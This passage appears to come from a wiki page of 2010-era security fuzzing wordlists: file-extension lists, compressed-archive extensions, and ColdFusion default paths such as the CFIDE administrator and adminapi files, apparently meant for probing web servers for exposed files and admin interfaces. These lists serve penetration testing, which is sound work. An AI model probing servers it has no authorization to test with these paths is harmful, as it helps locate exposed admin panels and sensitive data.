.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
